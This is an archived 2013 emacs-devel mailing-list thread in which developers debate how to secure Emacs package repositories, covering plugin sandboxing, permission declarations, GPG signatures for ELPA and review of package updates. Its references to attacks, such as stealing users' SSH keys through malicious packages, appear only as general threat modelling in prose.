admit) has really tried to "break" it or use it in production.
Post by Matthias Dahl
But the problem here is a bit more "relaxed", imho. We are not talking about
hardening / sandboxing a language in general but only a very concrete
functionality in a specific program (which, granted, is very tightly
intervened with the language it is written in).
No, it's *not* a concrete functionality. The concrete functionality
is "Shall the plugin be installed?" The answer to that is easy to
implement.

But if you're talking about preventing an untrusted plugin from doing
"evil" things, you need to accompany every call to a sensitive
function with some way to determine whether the function should be
executed or not. That is a sandbox, but you're welcome to call it by
a different name if you like.
Post by Matthias Dahl
[Refusing to install untrusted code] may reduce the risk but is
this really a solution?
I believe there is no solution. Security as we understand it today is
about preventing some entities from accessing the functionality of
certain other entities. The more security, the less functionality can
be accessed. You can't get both to 100%.
Post by Matthias Dahl
Say you use only the great jedi.el for your Python development. I
am sure that its author Takafumi Arakaki would never put anything
harmful in it... but I can imagine several scenarios how something
harmful could end up in it nevertheless without him noticing it for
a while.
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."

There's another answer based on the details of your example. I avoid
doing development on exposed hosts. In one sense that's unfair, but
in another it goes to the heart of the matter.
Matthias Dahl
2013-09-30 15:25:06 UTC
Permalink
Hello Stephhen...
Post by Stephen J. Turnbull
Sure. *Preventing* that is going require doing something that is
probably impossible for any program that isn't an operating system in
control of the machine.
I am not saying a sandbox is the best solution. But imho, something
should be done... or would be nice to have. Even if it is community
based reputation system.
Post by Stephen J. Turnbull
Post by Matthias Dahl
You wouldn't work as root on your system, would you?
I do every day, to run emerge --update. ;-)
Ah, a fellow Gentoo user. ;) Running system updates as root is one
thing, working as root as daily routine where those privileges are just
not required, is careless (for many reasons), to say the least. And I
guess that is not would you do. :)
Post by Stephen J. Turnbull
The interesting question is, "why should a plugin be denied the rights
it needs when those go beyond reading the buffer it was invoked from?"
Who said it should get those privileges denied? If it was installed and
declared its required permissions, it will get those. Or am I missing
something obvious from your statement/question here?
Post by Stephen J. Turnbull
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."
So you check the source for the plugins you use with each new update? Or
who else would you notice malicious code?

And if a plugin is driver by a single author, chances are that something
can go unnoticed for a while if the target group of said plugin is not a
very technical one... and as I learned in this thread, there are many
more Emacs users with a non-technical background.
Post by Stephen J. Turnbull
There's another answer based on the details of your example. I avoid
doing development on exposed hosts. In one sense that's unfair, but
in another it goes to the heart of the matter.
Which shows, you care about security too and take preventive measures.
Unfortunately, not everybody can work that way for various reasons, though.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-10-01 02:19:50 UTC
Permalink
Post by Matthias Dahl
I am not saying a sandbox is the best solution. But imho, something
should be done... or would be nice to have. Even if it is community
based reputation system.
We already have that. GNU ELPA requires somebody who has been
acknowledged to be responsible to look at it before it gets added.
Some of the others don't.
Post by Matthias Dahl
Who said it should get those privileges denied? If it was installed and
declared its required permissions, it will get those. Or am I missing
something obvious from your statement/question here?
No, you're missing the fact that self-declaring required permissions
means you get all the permissions you need. For good or evil....
Post by Matthias Dahl
Post by Stephen J. Turnbull
Sure. But the chances are pretty good that I would. Anyway, the
definition of "absolutely need" is "I'm willing to bet that I or some
other user would catch it even if the author doesn't."
So you check the source for the plugins you use with each new
update?
On exposed hosts and for applications that can be invoked by any user,
yes, I do.
Post by Matthias Dahl
Which shows, you care about security too and take preventive measures.
Unfortunately, not everybody can work that way for various reasons, though.
And those who don't will eventually pay the price. That's OK, it may
very well be a rational choice to take the risk. I do, on other hosts
with other purposes. But the problem is that typically other people
*also* pay the price.
chad
2013-09-27 20:12:18 UTC
Permalink
Post by Matthias Dahl
All I am saying is: It would be very helpful if we could give the user a
few tools to handle, grasp and maybe harden certain security aspects.
If the user is downloading and running random code from the internet
without checking its source in any way, then there's really not
very much you can do. Java tries to do this to fairly great expense,
and only vaguely succeeds. Python tried and gave up (apparently).

If people download and run code from GNU ELPA, then there's a
moderate degree of group-checking safety involved, similar to Debian
(once elpa signing is in place). If they insist on using random
snippets from wikis, forums, and marmalade (apparently; I haven't
looked closely at marmalade), then there's really not.
Post by Matthias Dahl
You wouldn't work as root on your system, would you? And why should a
plugin get full rights if just needs a few infos from the local buffer?
I think this `joke' from XKCD is pretty instructive here:

http://xkcd.com/1200/

In other words, "at least they didn't get root" doesn't really
reflect the way computers are used today (/for the last decade).

As a practical matter of giving the user a few tools, you might be
better off looking at taint checking (perl, ruby) and warning the
user (and potentially, elpa/marmalade/etc), rather than trying to
add java-style sandboxing to elisp.

I hope that helps,
~Chad
Andreas Röhler
2013-09-26 09:31:33 UTC
Permalink
Post by Stephen J. Turnbull
Post by Matthias Dahl
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually not quite the statement one wants to read _ever_ about the
software one loves to use. ;)
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually.
Then your model of security is inadequate. Software is *inherently*
insecure. [ ... ]
That's it.

BTW why don't we drive armored cars in daily life, if armored chars are designed to be more secure?
Because experiences in a dry and rocky region proved the opposite.
Richard Stallman
2013-09-26 16:25:32 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.

The basic question is, what sorts of things do we want security against?

So far, we have put effort into security against

* Attacks through files you might examine.

* Surreptitious substitution of the wrong code
instead of what you think you are downloading.

If the existence of package repositories introduces new ways to do
those things, we should do what is needed to make them safe.

Does anyone think we should start worrying about some other attack?
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-27 14:18:03 UTC
Permalink
Hello Richard...
Post by Richard Stallman
* Surreptitious substitution of the wrong code
instead of what you think you are downloading.
In all honesty, I strongly believe that packages that contain malicious
code would fall under this category.

I think the world in Emacs has changed: It is now even easier to get
packages simply through the package system. Projects advertise that they
should be installed through (M)ELPA or Marmelade. Yet nowhere is any
mention about the security aspects of it.

- Neither repository checks the code for quality and security. And if
a plugin should get withdrawn from a repository because it really was
infected, there is no way to inform a user about it except through the
bad press that followed.

As a counter example: Plugins distributed through addons.mozilla.org
are checked for security - initial versions as well as updates.

- An Emacs plugin can do whatever it chooses to do with the full
privileges of the current user. But why give a plugin all such power
in the first place? Informing the user beforehand what privileges a
plugin required and thus tightening the belt on a plugin, would make
things more transparent and more secure.

I would also _never_ install anything from MELPA if the source of it was
from the wiki which everyone can edit freely, afaik.

Sorry for the wall of text. :(

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Óscar Fuentes
2013-09-27 15:04:55 UTC
Permalink
Matthias Dahl <ml_emacs-***@binary-island.eu> writes:

[snip]
Post by Matthias Dahl
As a counter example: Plugins distributed through addons.mozilla.org
are checked for security - initial versions as well as updates.
I don't think that comparing Emacs to a web browses used by tens of
millions is fair. The later is a major attack target/vector for any
crook, while Emacs is mostly uninteresting. No matter all the effort the
Mozilla guys put on security, it is their web browser the real security
threat on your system, not Emacs.
Post by Matthias Dahl
- An Emacs plugin can do whatever it chooses to do with the full
privileges of the current user. But why give a plugin all such power
in the first place? Informing the user beforehand what privileges a
plugin required and thus tightening the belt on a plugin, would make
things more transparent and more secure.
Yes, sure. And I think that it can be achieved without too much effort
(read: without rewriting whole chunks of Emacs code.)

Add support for declaring the capabilities the .el file being read
requires: write access to the filesystem, network I/O, running
processes, etc. Encode that on a data structure (a plain integer would
do) associated to each function on that .el file. Then, when a function
is executed its permissions becomes effective and are checked by the
primitive functions that implement the sensitive operation. Of course,
when function F calls function G the permissions of F are effective over
G, on a restrictive way. Also, it could be possible to declare "safe"
functions which privileges can override the caller permissions on a
permissive way. Those functions would be on the Emacs core, of course.

I guess that this schema would require minimal changes to the
interpreter, byte compiler and core functions that perform sensitive
operations. On exchange, the user would know that such and such packages
are not allowed to send his all-important files through the internet,
nor delete his entire home directory.

[snip]
Thomas Koch
2014-09-13 17:57:15 UTC
Permalink
Post by Óscar Fuentes
I don't think that comparing Emacs to a web browses used by tens of
millions is fair. The later is a major attack target/vector for any
crook, while Emacs is mostly uninteresting. No matter all the effort the
Mozilla guys put on security, it is their web browser the real security
threat on your system, not Emacs.
If I'd have criminal interest and the possibility to distribute malicious lisp
code to a few hundert emacs users I'd:

- collect all private ssh and gpg keys found in the victims homedir and access
data to their email accounts
- replace my attack lisp code with legitimate code after it has done its work
- sell the collected data to interested parties

I know that there are a lot of emacs users that are system administrators of
interesting targets.

Regards, Thomas Koch

Ted Zlatanov
2013-09-29 10:12:19 UTC
Permalink
On Thu, 26 Sep 2013 12:25:32 -0400 Richard Stallman <***@gnu.org> wrote:

RS> The basic question is, what sorts of things do we want security against?

RS> So far, we have put effort into security against

RS> * Attacks through files you might examine.

RS> * Surreptitious substitution of the wrong code
RS> instead of what you think you are downloading.

RS> If the existence of package repositories introduces new ways to do
RS> those things, we should do what is needed to make them safe.

We need to question whether relying on GPG is the right thing here, or
if we need an Emacs Lisp-based or C-based solution to authenticate
content signatures. I am leaning towards the latter after years of
experience with GPG and epg.el (without questioning the quality of
epg.el, which is very good). At the very least, spawning an external
process to verify a signature for every package download seems wasteful.

In addition, I think we need reviews of package updates before they are
rolled out on the GNU ELPA. It's a lot of work.

RS> Does anyone think we should start worrying about some other attack?

"Just because you're paranoid doesn't mean they're not after you."

Here is a quick list of other attacks. I am not posing conspiracy
theories; the below are all based on real-life compromises I have seen
in other software or in GNU Emacs.

(note that the GNU ELPA can be used by many versions of Emacs, some with
bugs that are fixed later but could be exploitable at that version)

- injection of binary blobs, even if well-intended

- injection of external resources, e.g. a URL which suddenly starts
generating an image that can exploit a libgif bug to compromise a
system (note that this can be easily targeted to a single IP)

- DDoS of a target website or service by using their resources (this
could be intentional or accidental)

- injection of code that is not GPLed or is otherwise legally
questionable

- targeted attacks, e.g. compromises that work on only one user's
machine but behave well otherwise

- exploits of the Emacs Lisp parser, e.g. imagine a bug in the hashtable
reader or a specially-formatted comment that breaks the symbol table
(I'm not aware of such bugs, this is just an example)

- exploits of file-local variables

- advice-based attacks (package X advises function F in a non-obvious
way to compromise security)

I hope this is useful.

Ted
Ted Zlatanov
2013-09-29 09:53:36 UTC
Permalink
Post by Matthias Dahl
I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.

SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).

VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.

As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption so this is pushing me again towards a more
built-in Lispy way to do signing of packages. Opinions welcome,
especially if you can think of a way that Emacs can sign files in a
similar way to GPG keys in Lisp.

In any case, I posted a patch (probably needs to be rewritten by now)
which intercepted package.el file requests and required an additional
.sig file that signed the file. So any file, tarball, or index requires
a maintainer signature to be used.
Post by Matthias Dahl
The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness).
SM> Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
SM> it's usually not considered as a very major problem.

SM> W.r.t. GNU ELPA packages, every commit installed send an email
SM> containing the diff to a mailing-list to which some people are
SM> subscribed, so there is a bit of review there, but it's far from
SM> sufficient to prevent introduction of security problems.

Stefan, I don't know if you remember it the same way, but when I worked
with you on getting ELPA started, I recall I had the maintainer rolling
out updates manually after review. We added the cron job later (maybe I
was involved, I honestly don't remember) but I definitely wanted to
avoid the current situation where updates to GNU ELPA packages get
rolled out straight to our users without review.

Unlike VCS updates, the GNU ELPA updates go to live users who don't know
they may be using bleeding-edge or risky code, and IMHO should be gated
by some kind of maintainer review or at least marked as "unreviewed
update" in the UI. The auto-merging of external repos is an even bigger
issue; again we need to establish a wall between developers and our live
users but here we trust external groups of contributors to DTRT.

I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
Post by Matthias Dahl
So, I'd like to propose the following as at least some measure of
protection and a first step in making the package system more secure: A
package gets a security context which details its very own permissions
just like e.g. an Android app. That context is permanent, meaning that
SM> Sandboxing could be an interesting direction, but it seems very
SM> difficult: not only it'll be a non-trivial amount of implementation
SM> work, but even just designing it will be difficult, due to the current
SM> nature of Emacs's design where everything is global and shared.

There are too many ways to compromise Emacs Lisp because it was not
written with security in mind. Also see my previous proposals for
secure data storage in Emacs, which would certainly be relevant if we
consider external packages as a possible attack vector. Even that
relatively minor improvement has met significant resistance; I would
imagine a full security-oriented redesign would be as popular as
SELinux.

Ted
Daiki Ueno
2013-09-29 17:49:36 UTC
Permalink
On Mon, 23 Sep 2013 10:17:33 -0400 Stefan Monnier
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.
SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).
VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.
I don't see much relation between this and what Stefan is talking above.
For signature verification, passphrase prompt shouldn't be used, since
it does not require any secret key operation.

For signing with an "archive" key, do you really want to do that with
Emacs, instead of other handy scripting languages?
As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption so this is pushing me again towards a more
built-in Lispy way to do signing of packages. Opinions welcome,
especially if you can think of a way that Emacs can sign files in a
similar way to GPG keys in Lisp.
I remember that you asked this in the past, and I answered that it might
make some sense as long as the code produces a signature in a
standardized format as GPG does. You then responded that you didn't
have enough knowledge to implement it.

I don't think it is a constructive attitude to repeat the same argument
without any outcomes and even omitting the background.

Regards,
--
Daiki Ueno
Ted Zlatanov
2013-09-29 18:18:36 UTC
Permalink
On Mon, 23 Sep 2013 10:17:33 -0400 Stefan Monnier
SM> The current state, AFAIK is that we decided that ELPA servers should
SM> put *.gpg signatures alongside their tarballs and other files, signed
SM> with an "archive" key. This signature can be used to check that the
SM> package you get indeed comes from that archive.
SM> In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
SM> on it).
VERY slowly. I tried to get back to it, only to find out (see other
thread under subject "bad epg.el+GPG2 behavior: unavoidable passphrase
pinentry prompt") that GPG2 is practically unusable. Frustrating.
DU> I don't see much relation between this and what Stefan is talking above.
DU> For signature verification, passphrase prompt shouldn't be used, since
DU> it does not require any secret key operation.

Right. I didn't mean that GPG2 is blocking the package signing work
specifically.

But if, for any reason, GPG2 decides to pop up passphrase prompts, it
will make package.el unusable *and it can't be disabled*. So this is a
concern IMO, even if we assume it will not require passphrases, because
it could make the user experience painful outside of our control. This
is what annoys me about GPG1 or 2, that it's an application and not a
library. At least GPG1 could be consistently driven in batch mode.

DU> For signing with an "archive" key, do you really want to do that with
DU> Emacs, instead of other handy scripting languages?

Naturally.
As I've mentioned in the past, I dislike relying on an external binary
like GPG to do encryption so this is pushing me again towards a more
built-in Lispy way to do signing of packages. Opinions welcome,
especially if you can think of a way that Emacs can sign files in a
similar way to GPG keys in Lisp.
DU> I remember that you asked this in the past, and I answered that it might
DU> make some sense as long as the code produces a signature in a
DU> standardized format as GPG does. You then responded that you didn't
DU> have enough knowledge to implement it.

DU> I don't think it is a constructive attitude to repeat the same argument
DU> without any outcomes and even omitting the background.

Let's just say I'll implement the OpenPGP protocol emulation as in
http://tools.ietf.org/html/rfc4880 when I get to it, and anyone else
that thinks it's worthwhile can work with me or do it themselves.

I hope you consider that constructive.

Ted
Ted Zlatanov
2013-09-30 13:25:39 UTC
Permalink
On Sun, 29 Sep 2013 14:18:36 -0400 Ted Zlatanov <***@lifelogs.com> wrote:

TZ> Let's just say I'll implement the OpenPGP protocol emulation as in
TZ> http://tools.ietf.org/html/rfc4880 when I get to it, and anyone else
TZ> that thinks it's worthwhile can work with me or do it themselves.

Hmm, looks like libnettle (brought in with GnuTLS) already provides most
of the infrastructure needed. The question for me is, should I bother
with a full OpenPGP signature emulation, or is it sufficient to
implement RSA/DSA/EC-based signatures for Emacs internal use only? The
latter is going to be much less work; it's basically exposing the
functions in http://www.lysator.liu.se/~nisse/nettle/nettle.html#RSA
http://www.lysator.liu.se/~nisse/nettle/nettle.html#DSA
http://www.lysator.liu.se/~nisse/nettle/nettle.html#Elliptic-curves to
Emacs.

Ted
Stephen J. Turnbull
2013-09-30 14:50:57 UTC
Permalink
Post by Ted Zlatanov
Hmm, looks like libnettle (brought in with GnuTLS) already provides most
of the infrastructure needed. The question for me is, should I bother
with a full OpenPGP signature emulation,
No, don't just "emulate" it, implement the protocol accurately.
Post by Ted Zlatanov
or is it sufficient to implement RSA/DSA/EC-based signatures for
Emacs internal use only?
No. In security, multiple implementations are a very good thing as
long as they're used to cross-check correct implementation of a
protocol and don't define their own protocols.
Matthias Dahl
2013-09-30 15:10:43 UTC
Permalink
Hello...
Post by Ted Zlatanov
I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
Ted, that would be really nice to have but as it was brought up earlier
in this thread, this is not gonna happen. And I can honestly understand
why it can't happen. The amount of manpower required to really do this
properly, is not something that could be easily shouldered by a team of
trusted volunteers in a timely manner.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Ted Zlatanov
2013-09-30 17:18:10 UTC
Permalink
On Mon, 30 Sep 2013 17:10:43 +0200 Matthias Dahl <***@binary-island.eu> wrote:

MD> Hello...
Post by Ted Zlatanov
I would propose using the signature files above to provide that wall,
so auto-signing should not be done. Instead a maintainer team should
review changes that need to go up on the GNU ELPA.
MD> Ted, that would be really nice to have but as it was brought up earlier
MD> in this thread, this is not gonna happen. And I can honestly understand
MD> why it can't happen. The amount of manpower required to really do this
MD> properly, is not something that could be easily shouldered by a team of
MD> trusted volunteers in a timely manner.

A much more complex version of this process works for Debian. I think
the amount of changes is not bad for a daily review, especially if we
move to a branch+pull request+merge model for the GNU ELPA. Github's
infrastructure and UI for this is quite good. Oh, and of course the
same branch+pull request+merge model could apply to the Emacs core as
well; that IMO would be really nice.

I think it's much less likely that Emacs will be rewritten to provide a
sandbox for packages, and a community review process is more valuable in
the long term in any case.

Ted
Matthias Dahl
2013-10-01 14:03:56 UTC
Permalink
Hello @all...

First of all, thanks to everyone for weighing in their respective
opinions and investing their time-- on- and off list.

A sandbox as initially discussed, is unanimously the wrong path to take
for various reasons that were brought up in detail, so I stand corrected
and also agree with the admittedly convincing arguments.

But some interesting points came up in the course of all of this: There
are people reviewing packages even it is just for their own sake and due
to their own security needs. Those people check code, the history of the
maintainers and keep an watchful eye on things. But they usually do so
for their own.

Maybe this is just wishful thinking but what if we could channel that
effort into a single and package repository independent project?

Please let me explain: The project would mostly build on the web of
trust principle. Basically people can review and rate packages. And in
order to do so, you need a certain level of trust which you gain through
ratings or pledges from already trusted reviewers. Initially those could
be the Emacs and respective package maintainers and so forth.

The interesting part though: This service should most definitely work
across all package repositories. That way, no matter if you download
from ELPA or MELPA or Marmalade or whatever the future brings, the
service is queried. The crux would be in defining an universal way to
detect a package and its version. This could be through hashes across
all .el files for example, which all repos obviously deliver and have
in common.

package.el could be extended to properly display all available metrics
on the detail page of a package to keep the load down on the service. It
would display the metrics for the current version as well as the overall
metrics (which would be useful if the current version hadn't been rated
yet).

Earlier in this thread, I mentioned I'd like to see better tools for
users, so what about this: A user can comfortably review a package in
Emacs when it is downloaded and before it is loaded (even a batch of
packages). The same goes for updates: He can see diffs between the new
version and one he had installed. This could easily be combined with a
review or rating to the service mentioned previously.

Naturally, all of this optionally without anyone being forced to do so.

Last but not least: Through an API key, all repos could report to the
service download metrics which can give a _very_ rough clue about how
popular a package might be. Thus, we would finally have accumulated
metrics for this and other things across repos.

This is just (again) thinking out loud. But I think this "solution" has
some very promising potential because it is non-invasive to how Emacs
currently works (= no sandbox effort), does not give a false sense of
security and overall encourages the community to actually review code.
And by all of this, it actually does imho increase security.

And if those people who already review code, continue to do so but also
report their findings back to the service and maybe rate other people
they know and trust, this could actually work rather well.

Ideally, the service could be extended in the future to make it a place
where code review for newcomers (new packages) could happen to improve
their work... just like it is done on the list right now.

I'm a bit afraid to ask but what do you guys and gals think? :)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-10-02 02:45:13 UTC
Permalink
Post by Matthias Dahl
Maybe this is just wishful thinking but what if we could channel that
effort into a single and package repository independent project?
Please let me explain: The project would mostly build on the web of
trust principle. Basically people can review and rate packages. And in
order to do so, you need a certain level of trust which you gain through
ratings or pledges from already trusted reviewers. Initially those could
be the Emacs and respective package maintainers and so forth.
It could work. After all, people do write documentation. :-) And this
is something a few non-programmers (a mostly untapped resource) could
put a lot of effort into, because at least at startup there will be a
lot of admin and advocacy to be done. Design of the metrics is going
to be an ongoing effort. The idea of having it be a separate project
means that XEmacs and SXEmacs people can get into the act to some
extent.

However, there is at least one point where your argument is not so
strong. And that is that (as a sysadmin) I don't review *any* Emacs
code---it's not "mission-critical" on those hosts where I care about
Emacsen security. People who suffer from my style of paranoia have to
reduce the complexity of their environments, or they won't get
anything else done. I suspect that outside of the core development
community there are few doing much reviewing. Also, package
maintainers really shouldn't be trusted initially, because there are
folks who have been maintaining their packages for decades but nobody
really knows them. Of course, those well-known to core can be added
to the trusted group immediately.

Specifically, with respect to Emacsen, I trust that core changes to
XEmacs get reviewed by the reviewers, and on "exposed systems" I use
use nothing but what XEmacs calls "core Lisp" plus the "xemacs-base"
and "text-modes" packages (and "text-modes" is stripped of libraries I
don't use). It's a minimal configuration useful for viewing logs and
maintaining configuration files, and the release is several years old.
(XEmacs 21.4.20 -- but Emacs 18.55 would probably do just as well!
Not quite, I do need to be able to decode and display non-ASCII, but I
don't currently ever need to edit it.) But Gnus, calendar, and
jedi.el just aren't even installed on such hosts. I suppose some
people in my position would also install org-mode, but I haven't
caught that bug.
Loading...